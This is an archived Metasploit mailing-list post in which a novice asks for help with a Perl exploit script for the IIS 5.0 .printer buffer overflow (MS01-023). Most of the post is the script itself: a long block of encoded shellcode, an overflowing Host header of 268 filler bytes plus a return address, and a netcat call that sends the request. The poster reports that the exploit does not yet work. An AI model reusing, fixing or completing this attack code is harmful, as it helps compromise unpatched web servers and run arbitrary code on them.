iis50_printer_overflow

[sonixxfx at gmail.com (Sonixxfx)]

Hi,

I am trying to write an exploit for the "iis50_printer_overflow"
vulnerability (http://www.osvdb.org/3323
http://www.microsoft.com/technet/security/bulletin/MS01-023.mspx
http://seclists.org/lists/bugtraq/2001/May/0005.html
http://milw0rm.com/metasploit.php?id=27), but I run into a problem. It is
the first time I am doing this and I cannot write in C. I have read the
exellent part Vinnie Liu wrote about writing exploits, but I cannot find
enough info in it to solve my problem.

The problem seems to be that I have few space available after the return
address for the payload. I believe there is something about 240 bytes
available. So my question is how can I make use of both the space available
after the return address but also before the return address? There are 268
bytes available before the return address.
I have made use of a "call esp" opcode because I saw my attack string in esp
in ollydbg. I saw an exploit online that makes use of the same vulnerability
but it seem to be using a "call ebx" opcode, so I used a "call ebx" opcode
too but also without result.

Below is the perl script that I have written. I have determined bad
characters, and decoded etc, but when I try this with ollydbg nothing seems
to change in olly and inetinfo keeps running.

Please keep in mind that I am a n00b on this subject.

This is my perl program:

$payload =

"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56".
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58".
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44".
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d".
"\x4e\x4f\x4a\x4e\x46\x34\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x44".
"\x4e\x33\x4b\x38\x4e\x37\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48".
"\x4f\x44\x4a\x51\x4b\x48\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54".
"\x4b\x58\x46\x53\x4b\x38\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39".
"\x4e\x4a\x46\x58\x42\x4c\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30".
"\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46".
"\x4b\x38\x4e\x50\x4b\x34\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e".
"\x4b\x58\x4e\x41\x4b\x38\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42".
"\x46\x50\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53".
"\x45\x38\x42\x4c\x4a\x47\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x58".
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50".
"\x4b\x38\x42\x58\x42\x4b\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36".
"\x4e\x33\x4f\x45\x41\x33\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f".
"\x43\x58\x42\x4c\x4b\x37\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50".
"\x4f\x55\x4a\x36\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f".
"\x47\x4e\x49\x36\x42\x37\x43\x36\x4f\x56\x50\x56\x48\x36\x49\x36".
"\x47\x46\x42\x30\x5a";

$string = "GET /";
$string .= "NULL.printer HTTP/1.0\r\n";
$string .= "Host: ";
$string .= "A" x 268;
$string .= "\xf3\x45\x2c\x73";
$string .= $payload;
$string .= "\r\n\r\n";

open (NC, "|nc.exe 127.0.0.1 80");
print NC $string;
close(NC);

I hope I have included enough information. I am a bit tired at the moment.

B.t.w. Nice looking man this morning on your website Metasploit ;)

Thanks

Regards,

Ben
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060302/1376b01b/attachment.htm>